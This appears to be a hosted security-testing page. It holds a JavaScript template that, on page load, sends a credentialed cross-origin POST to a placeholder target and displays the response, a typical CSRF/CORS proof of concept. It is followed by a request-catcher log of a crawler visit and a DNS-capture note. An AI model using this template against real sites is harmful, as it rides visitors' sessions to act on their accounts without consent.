<html>
<head></head>
<body>
<div id="result"></div>

<script>
function run(){
	var url = 'https://target.com';
	var data = 'data_to_send';

	var http;
	http = new XMLHttpRequest();

	http.open("POST", url, true);
	http.setRequestHeader('Content-Type', 'text/plain');
	http.withCredentials="true";
	http.onreadystatechange = function(){
		if(http.readystate == 4){
			var response = http.responseText;
			document.getElementById('result').innerHTML = response;
		}
	}
	http.send(data);
}

run();
</script>

</body>

Request Method: GET
Request Time: 1749686368
Query String: dfhMCr
HTTP Referer:
HTTP User Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36
HTTP X-FORWARDED-FOR:
HTTP Client IP:
Remote Addr: 3.221.156.96
Remote Host:
Remote Port: 15935
Request URI: /o/dfhMCr
PHP Auth User:
PHP Auth PW:
Requests: [id] => dfhMCr
 

DNS lookups for: *.dfhMC.o.swin.es